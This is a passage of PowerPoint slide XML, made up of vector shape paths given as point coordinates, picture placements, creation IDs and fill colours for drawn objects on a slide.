                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484917" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444703" y="676590"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="651779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="658797"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="469100" y="651779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469100" y="651779"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="701836" y="593238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="593238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="593238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="25058"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="126003"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="133045"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="56817" y="126003"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56817" y="126003"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="19324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="19324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="19324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="16469"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677331" y="16916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="16469"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="672840" y="16469"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677331" y="16916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469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7" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7E2C7F-0698-232B-783C-30DA7FB473E6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25630" y="2858289"/>
              <a:ext cx="527292" cy="534920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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BB1D6A3D-F692-67C8-0215-8D551F2CA91E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2761335" y="2930004"/>
              <a:ext cx="447040" cy="269875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="397954" y="141566"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="396227" y="132588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="208788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="217766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397954" y="141566"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="407085" y="72986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="405396" y="64008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="140208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="149186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407085" y="72986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443661" y="111086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441960" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="185928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="194906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443661" y="111086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443661" y="88226"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441960" y="79248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="163068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="172046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443661" y="88226"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443674" y="184238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441947" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="269582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443674" y="184238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="446722" y="8978"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="444995" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048" y="85344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4775" y="94322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446722" y="8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9" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D2C601C-3E5A-3C91-0C3A-8FCEC24EEC90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12928" y="3595179"/>
              <a:ext cx="1146369" cy="96316"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F12DD9AA-513B-F7C7-2AFC-209C67C7830A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06568" y="3776875"/>
              <a:ext cx="242749" cy="215645"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="object 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA5FECF-45CA-D61C-DEA0-04C5293A231D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52714" y="3518048"/>
              <a:ext cx="650626" cy="961390"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12428EFA-D6B3-3AA0-CA99-8D9DEEC7EC3D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82061" y="3748300"/>
              <a:ext cx="694001" cy="797050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C7A107D5-5363-E549-A554-DD662473F3D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1482061" y="3748300"/>
              <a:ext cx="694055" cy="797560"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="694055" h="797560">
                  <a:moveTo>
                    <a:pt x="561593" y="742948"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261772" y="797050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136974" y="755140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136974" y="737614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236660" y="718564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236660" y="679702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26633" y="717040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="706372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666607" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694001" y="10667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694001" y="597406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410922" y="648460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410922" y="687322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435273" y="681988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561593" y="726946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561593" y="742948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id="{EAC5E93D-9D20-DBAB-B8A8-8956086BAC66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1617513" y="4481343"/>
              <a:ext cx="125095" cy="66040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="125094" h="66039">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124798" y="65531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124798" y="47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8A7AD611-F85E-105F-49CF-1B1161615188}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1743833" y="4475247"/>
              <a:ext cx="297815" cy="68580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="297814" h="68579">
                  <a:moveTo>
                    <a:pt x="297538" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="53339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="68579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297538" y="13715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29753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F2607388-92AA-1E74-332C-FAAB85288FAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1717961" y="4411239"/>
              <a:ext cx="36830" cy="74930"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="74929">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="74675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="9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3B6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7" name="object 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B55A81-2813-61EE-BB8B-7A76D7A73BC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1482061" y="3867172"/>
              <a:ext cx="36830" cy="596900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="596900">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="582166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="596644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="14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id="{9D9D8737-3A03-6766-99CF-85967B53A35F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1509456" y="3763540"/>
              <a:ext cx="668655" cy="698500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="668655" h="698500">
                  <a:moveTo>
                    <a:pt x="668129" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="697990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668129" y="579118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66812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9" name="object 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6770E0-63AE-08FA-5B40-B7E93D29684E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1505270" y="3758541"/>
              <a:ext cx="676910" cy="708025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="119593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="707990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28107" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3452" y="698862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28247" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="697987"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3452" y="698862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="668124" y="580608"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28107" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="587632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="671583" y="579992"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="579992"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="579992"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673044" y="9123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="4998"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="123108"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="126622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="28247" y="123108"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28247" y="123108"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="668124" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673044" y="9123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998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0" name="object 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6855429-B3F1-7971-1AEB-966D03B22E21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1576421" y="3829072"/>
              <a:ext cx="546735" cy="562610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="546735" h="562610">
                  <a:moveTo>
                    <a:pt x="546374" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="96773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="562354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546374" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546374" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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61" name="object 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A21140-D4EC-070C-CD46-70CA369D6E74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399" y="4360947"/>
              <a:ext cx="141539" cy="124967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692F6638-9AA1-2E72-AE42-165E6FCAC926}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1473310" y="3739247"/>
              <a:ext cx="711835" cy="815340"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="232850" y="720422"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136969" y="739471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136969" y="770496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269864" y="815125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365907" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268971" y="797478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173247" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190689" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="734812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="271177" y="797080"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="268971" y="797478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="744676"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365907" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
